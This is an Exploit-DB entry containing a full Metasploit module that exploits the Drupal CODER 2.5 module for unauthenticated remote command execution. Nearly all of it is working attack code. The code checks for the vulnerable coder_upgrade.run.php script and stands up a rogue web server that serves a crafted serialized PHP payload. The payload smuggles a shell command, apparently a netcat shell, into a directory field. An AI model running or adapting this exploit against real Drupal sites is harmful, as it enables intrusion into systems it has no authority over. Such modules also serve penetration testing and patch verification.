Drupal Module CODER 2.5 - Remote Command Execution (Metasploit)

EDB-ID:

40149

CVE:

N/A




Platform:

PHP

Date:

2016-07-25


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Drupal CODER Module Remote Command Execution',
      'Description'    => %q{
        This module exploits a Remote Command Execution vulnerability in
        Drupal CODER Module. Unauthenticated users can execute arbitrary command
        under the context of the web server user.

        CODER module doesn't sufficiently validate user inputs in a script file
        that has the php extension. A malicious unauthenticated user can make
        requests directly to this file to execute arbitrary command.
        The module does not need to be enabled for this to be exploited

        This module was tested against CODER 2.5 with Drupal 7.5 installation on Ubuntu server.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Nicky Bloor',                         # discovery
          'Mehmet Ince <mehmet@mehmetince.net>'  # msf module
        ],
      'References'     =>
        [
          ['URL', 'https://www.drupal.org/node/2765575']
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 225,
          'DisableNops' => true,
          'BadChars'    => "\x00\x2f",
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'netcat netcat-e'
            },
        },
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Targets'        => [ ['Automatic', {}] ],
      'DisclosureDate' => 'Jul 13 2016',
      'DefaultTarget'  => 0
      ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/']),
        OptAddress.new('SRVHOST', [true, 'Bogus web server host to receive request from target and deliver payload']),
        OptPort.new('SRVPORT', [true, 'Bogus web server port to listen'])
      ]
    )
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
    )
    if res && res.code == 200
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def on_request_uri(cli, _request)
    print_status("Incoming request detected...")
    p = ''
    p << 'a:6:{s:5:"paths";a:3:{s:12:"modules_base";s:8:"../../..";s:10:"files_base";s:5:"../..";s:14:"libraries_base";s:5:"../..";}'
    p << 's:11:"theme_cache";s:16:"theme_cache_test";'
    p << 's:9:"variables";s:14:"variables_test";'
    p << 's:8:"upgrades";a:1:{i:0;a:2:{s:4:"path";s:2:"..";s:6:"module";s:3:"foo";}}'
    p << 's:10:"extensions";a:1:{s:3:"php";s:3:"php";}'
    p << 's:5:"items";a:1:{i:0;a:3:{s:7:"old_dir";s:12:"../../images";'
    p << 's:7:"new_dir";s:'
    p << (payload.encoded.length + 14).to_s
    p << ':"f --help && '
    p << payload.encoded
    p << ' #";s:4:"name";s:4:"test";}}}'
    print_status("Sending payload...")
    send_response(cli, p)
  end

  def exploit
    start_service
    send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
      'encode_params' => false,
      'vars_get' => {
        'file' => get_uri
      }
    )
    stop_service
  end
end